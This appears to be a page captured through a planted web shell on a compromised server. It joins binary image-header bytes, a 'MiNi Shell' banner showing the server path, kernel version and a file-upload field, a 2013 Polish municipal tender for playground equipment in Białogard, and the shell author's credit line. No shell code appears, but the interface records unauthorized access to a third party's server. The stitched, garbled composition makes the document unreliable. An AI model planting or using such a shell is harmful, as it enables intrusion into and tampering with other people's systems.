JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131009/409892-N-2013.html

<p class="kh_header"><b>Białogard: Dostawa i montaż urządzeń zabawowych na placu zabaw przy ul. Gryfitów w mieście Białogard</b><br>
<b>Numer ogłoszenia: 409892 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białogard - Urząd Miasta Białogardu , ul. 1-go Maja 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3122310, faks 094 3122919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialogard.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń zabawowych na placu zabaw przy ul. Gryfitów w mieście Białogard.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i montaż urządzeń zabawowych wraz z ogrodzeniem na nowy plac zabaw przy ul. Gryfitów w Białogardzie. 
2.	Szczegółowy opis przedmiotu zamówienia:
1)	montaż 1 zestawu zabawowego: rodzaj, ilość urządzeń, wyszczególnienie wymaganych elementów składowych wraz z parametrami, jakie powinny spełniać poszczególne urządzenia określone zostały poniżej w tabeli stanowiącej wykaz urządzeń zabawowych objętych zamówieniem. Montaż urządzeń zabawowych obejmuje: trwałe i stabilne zamontowanie urządzeń w podłożu na stalowych kotwach 
w miejscach wskazanych przez Zamawiającego.
2)	montaż ogrodzenia - ogrodzenie metalowe, panelowe, ocynkowane ogniowo. Konstrukcja z prętów 
i kształtowników stalowych zabezpieczonych antykorozyjnie. Furtka stalowa, zabezpieczona antykorozyjnie. Montaż ogrodzenia na stałe w gruncie. Wymiary placu 25 x 26 (102 m ogrodzenia).
3)	montaż tablicy regulaminowej - konstrukcja drewniana wykonana z impregnowanego drewna litego. Słup zakończony stalową ocynkowaną stopą kotwioną w gruncie za pomocą betonu. Tablica regulaminowa powinna być wyposażona w regulamin określający zasady i warunki korzystania z placu zabaw oraz wskazujący numery telefonów alarmowych. Maksymalna wysokość urządzenia 2,3 m.
4)	uporządkowanie terenu placu zabaw i terenu przyległego po przeprowadzonych robotach. Czynność 
ta obejmuje: wywiezienie materiałów zbędnych i odpadów, odtworzenie istniejącej nawierzchni 
w przypadku jej uszkodzenia w trakcie wykonywanych robót, wyrównanie terenu wokół urządzeń zabawowych.
3.	Wykaz urządzeń objętych zamówieniem: lp.	rodzaj urządzeń	dane techniczne	wymagane materiały	montaż	lokalizacja
1.	Zestaw zabawowy wielofunkcyjny składający się z następujących elementów: - 9 szt. wież, w tym 2 szt. z daszkami, - 2 szt. zjeżdżalni,- 1 szt. pomostu łukowego,
- 1 szt. przejścia tubowego, - 2 szt. pomostu ruchomego,- 1 szt. pomostu - belki,- 3 szt. pomostów skośnych stałych,- 1 szt. drabinki poziomej skośnej,- 1 szt. kierownicy,- 1 szt. przeplotni linowej,- 1 szt. trapu pochyłego z liną,- 1 szt. liny wspinaczkowej,- 1 szt. balkoniku,- 1 szt. drabinki linowej,- 1 szt. ścianki wspinaczkowej,- 1 szt. modułu typub sklepik,- 2 szt. elementu kółko i krzyżyk. Wszystkie elementy połączone ze sobą tworząc konstrukcję zamkniętą.	Wymiary zestawu: dopuszczalny przedział długość - do 11 m, szerokość - do 9 m, wysokość - do 4 m. Przy lokalizacji urządzeń należy zachować zalecane przez producenta strefy bezpieczeństwa (dopuszczalne rozbieżności w wymiarach plus minus 3%)	- drewno klejone warstwowo impregnowanego próżniowo-cisnieniowo,- daszki oraz elementy zabezpieczające i ozdobne wykonane z płyty HDPE,- ślizg zjeżdżalni ze stali nierdzewnej,- liny stalowe w oplocie polipropylenowym,- przejście tubowe wykonane z rury PE,- elementy stalowe zabezpieczone antykorozyjni, malowane proszkowo,- rodzaj drewna modrzew- elementy złączne  osłonięte kapturkami z tworzywa sztucznego.- montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych - fundamenty pod urządzenia zgodnie z zaleceniami producenta ul. Gryfitów (nowy plac zabaw). Nawierzchnia terenu - trawa
2.	Bocianie gniazdo	Wymiary:- Szerokość: 3500 mm,- długość 1800 mm,- wysokość 2500 mm. - konstrukcja wykonana z drewna klejonego warstwowo impregnowanego próżniowo-cisnieniowo,- belka pozioma wykonana ze stali zabezpieczonej antykorozyjnie,- łańcuchy i zawiesia wykonane ze stali nierdzewnej,- liny stalowe w oplocie polipropylenowym,- 1 szt. siedziska typu bocianie gniazdo,- elementy złączne zabezpieczone zaślepkami. - montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych - fundamenty pod urządzenia zgodnie z zaleceniami producenta ul. Gryfitów (nowy plac zabaw). Nawierzchnia terenu - trawa
3. Zestaw sprawnościowy Wymiary:- Szerokość: 1800 mm, - wysokość 1800 mm	- konstrukcja wykonana z drewna klejonego warstwowo impregnowanego próżniowo-cisnieniowo,- górne belki poziome wykonane ze stali zabezpieczonej antykorozyjnie,- ścianka wspinaczkowa wykonana z płyty antypoślizgowej- liny stalowe w oplocie polipropylenowym,- elementy stalowe zabezpieczone antykorozyjnie,- elementy złączne zabezpieczone zaślepkami - montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych- fundamenty pod urządzenia zgodnie z zaleceniami producenta ul. Gryfitów (nowy plac zabaw) Nawierzchnia terenu - trawa
4. Bujak koniczynka Wymiary:- Szerokość: 1000 mm,- wysokość 1000 mm	- główny element konstrukcyjny stanowi sprężyna zabezpieczona antykorozyjnie, malowana proszkowo,- siedzisko w kształcie koniczynki wykonane z płyty HDPE,- elementy złączne zabezpieczone zaślepkami - montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych - fundamenty pod urządzenia zgodnie z zaleceniami producenta ul. Gryfitów (nowy plac zabaw) Nawierzchnia terenu - trawa
5. Huśtawka podwójna	Wymiary:- Szerokość: 2400 mm,- długość 1800 mm, - wysokość 2300 mm,- konstrukcja wykonana z drewna klejonego warstwowo impregnowanego próżniowo-cisnieniowo,- łańcuchy i zawiesia wykonane ze stali nierdzewnej,- siedziska gumowe z metalową wkładką wzmacniającą (1 szt. deska, 1 szt. kubełkowe),- elementy złączne zabezpieczone zaślepkami - montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych- fundamenty pod urządzenia zgodnie z zaleceniami producenta ul. Gryfitów (nowy plac zabaw). Nawierzchnia terenu - trawa
6. Huśtawka wagowa Wymiary:- długość 2400 mm,- wysokość 400 mm, - podstawa stalowa, zabezpieczona antykorozyjnie,- belka pozioma wykonana z drewna klejonego warstwowo  impregnowanego próżniowo-cisnieniowo,- siedziska i formatki wykonane ze sklejki wodoodpornej,- elementy metalowe zabezpieczone antykorozyjnie,- elementy złączne zabezpieczone zaślepkami. - montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych- fundamenty pod urządzenia zgodnie z zaleceniami producentaul. Gryfitów (nowy plac zabaw)
Nawierzchnia terenu - trawa
7. Bujak sprężynowy Wymiary: - długość 950 mm,- wysokość 300 mm,- główny element konstrukcyjny stanowi sprężyna zabezpieczona antykorozyjnie, malowana proszkowo,- formatka w kształcie konika z siedziskiem wykonane z płyty HDPE, - elementy złączne zabezpieczone zaślepkami- montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych- fundamenty pod urządzenia zgodnie z zaleceniami producenta ul. Gryfitów (nowy plac zabaw)
Nawierzchnia terenu - trawa
8.  Tablica do rysowania Wymiary:- szerokość 1000 mm,- długość 100 mm,- wysokość 1300 mm, - konstrukcja wykonana z drewna klejonego warstwowo impregnowanego próżniowo-cisnieniowo,- tablica do rysowania wykonana z płyty wodoodpornej, - elementy złączne zabezpieczone zaślepkami - montaż konstrukcji w gruncie na  kotwach stalowych ocynkowanych- fundamenty pod urządzenia zgodnie z zaleceniami producenta ul. Gryfitów (nowy plac zabaw)
Nawierzchnia terenu - trawa
9. Ogrodzenie + furtka	- Ogrodzenie panelowe koloru zielonego - Grubość drutu min fi 5 mm - Szerokość panelu 2500 m,- Wysokość panelu 1000 mm dopuszczalnerozbieżności w wymiarach plus minus 3%) - ogrodzenie metalowe, panelowe, ocynkowane ogniowo,- Konstrukcja z prętów i kształtowników stalowych zabezpieczonych antykorozyjnie. - Furtka (1 szt.) stalowa, zabezpieczona antykorozyjnie.  Montaż ogrodzenia na stałe w gruncie ul. Gryfitów (nowy plac zabaw)
Nawierzchnia terenu - trawa. 10. Montaż tablicy regulaminowej	Maksymalna wysokość urządzenia 2,3 m. konstrukcja drewniana wykonana z impregnowanego drewna litego. Słup zakończony stalową ocynkowaną stopą kotwioną w gruncie za pomocą betonu. Tablica regulaminowa powinna być wyposażona w regulamin określający zasady i warunki korzystania z placu zabaw oraz wskazujący numery telefonów alarmowych. 	Montaż tablicy na stałe w gruncie za pomocą betonu.	ul. Gryfitów -  nawierzchnia terenu - trawa
4. Wymagania dotyczące przedmiotu zamówienia: 1) urządzenia zabawowe muszą posiadać wysoką odporność na wpływ warunków atmosferycznych  (deszcz, słońce, śnieg) oraz na uszkodzenia mechaniczne (uderzenia, obciążenia), 2) materiały, substancje, śruby, łańcuchy, sprężyny i inne połączenia oraz elementy   zabezpieczające, wykorzystywane przy produkcji i montażu muszą posiadać wymagane atesty i dopuszczenia do stosowania, 3) wszystkie urządzenia zabawowe objęte realizacją zamówienia powinny posiadać aktualne certyfikaty wydawane przez jednostki certyfikujące, uprawniające do oznaczania urządzeń zabawowych znakiem bezpieczeństwa, 4) wszystkie urządzenia zabawowe muszą spełniać wymogi bezpieczeństwa w zakresie projektowania, produkcji, montażu i konserwacji, stawiane przez polskie i europejskie normy PN-EN 1176 oraz muszą być oznakowane zgodnie z wymogami wynikającymi z przepisów bezpieczeństwa, norm EN i PN oraz przepisów Prawa budowlanego, 5)podczas montażu Wykonawca ma obowiązek oznakować prowadzone prace, znać i stosować przepisy dotyczące ochrony środowiska i BHP, 6) urządzenia muszą być fabrycznie nowe. 5. Dodatkowe wymagania dotyczące urządzeń: wszystkie urządzenia fabrycznie nowe, konstrukcje urządzeń wykonane z drewna lub wykonane z metalu, elementy metalowe ze stali nierdzewnej, malowane proszkowo lub lakierem akrylowym lub ocynkowane, łańcuchy i śruby łączące elementy wykonane ze stali nierdzewnej lub ocynkowane, urządzenia muszą posiadać aktualne certyfikaty upoważniające do oznaczania wyrobu znakiem bezpieczeństwa (wymagane przed odbiorem końcowym zamówienia - do oferty Wykonawca zobowiązany jest do złożenia oświadczenia, że posiada aktualne certyfikaty i atesty). Wykonawca udzieli 36 miesięcznej gwarancji na wszystkie dostarczone urządzenia (liczone od dnia podpisania protokołu odbioru końcowego). 6. Zamawiający zastrzega sobie możliwość zmiany układu rozmieszczenia urządzeń zabawowych oraz ich przemieszczeń między poszczególnymi placami zabaw. 7. Wykonawca we własnym zakresie zobowiązany jest do: 1)	Odpowiedniego zabezpieczenia i oznakowania terenu robót oraz zapewnienia ochrony znajdującym się na nim mieniu, 2) Zapewnienia sobie wody i energii elektrycznej we własnym zakresie (Zamawiający wskaże Wykonawcy miejsce poboru wody), 3)	Przestrzegania przepisów bhp i ppoż., 4) Przekazania Zamawiającemu obiektu gotowego do użytkowania wraz z dokumentacją powykonawczą zawierającą wszystkie atesty i certyfikaty niezbędne do rozpoczęcia eksploatacji oraz informacji o udzielonej gwarancji, 5)	Zaleca się aby Wykonawca dokonał wizji lokalnej obszaru objętego zamówieniem oraz zebrał na swój własny koszt, odpowiedzialność i ryzyko, wszelkie informacje mogące okazać się niezbędne do przygotowania jego oferty. 
8.Nazwy i kody Wspólnego Słownika Zamówień (CPV): 37535200-9 Wyposażenie placów zabaw. 9.	Dodatkowe informacje dotyczące gwarancji: 1)	Wykonawca udzieli Zamawiającemu gwarancji na urządzenia na okres 3 lat. Bieg terminu gwarancji zaczyna się od dnia odbioru przedmiotu zamówienia przez  Zamawiającego. 2)	W okresie gwarancyjnym Wykonawca zobowiązany jest do przystąpienia do usuwania wad przedmiotu umowy w terminie 72 godzin od momentu zgłoszenia wady przez Zamawiającego. Termin na usunięcie wad określony zostanie każdorazowo przez Zamawiającego. 3) W przypadku nie usunięcia wad we wskazanym terminie Zamawiający ma prawo powierzyć usunięcie wad osobie trzeciej na koszt i niebezpieczeństwo Wykonawcy, nie zwalniając go od obowiązku uiszczenia kar umownych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, 
co najmniej 2 dostawy odpowiadające swoim rodzajem dostawie stanowiącej przedmiot zamówienia. 
Za dostawy odpowiadające swoim rodzajem dostawie będącej przedmiotem zamówienia Zamawiający uzna wykonanie (dostawę i montaż) co najmniej jednego placu zabaw wraz z ogrodzeniem, o wartości nie mniejszej niż 50.000 zł brutto</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę: min. 50.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.bialogard.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Białogard - Urząd Miasta Białogard 
ul. 1-go Maja 18 
78-200 Białogard 
Wydział Inwestycji i Zamówień Publicznych, p.216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2013 godzina 09:00, miejsce: Miasto Białogard - Urząd Miasta Białogard 
ul. 1-go Maja 18 
78-200 Białogard 
Sekretariat, p.224.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com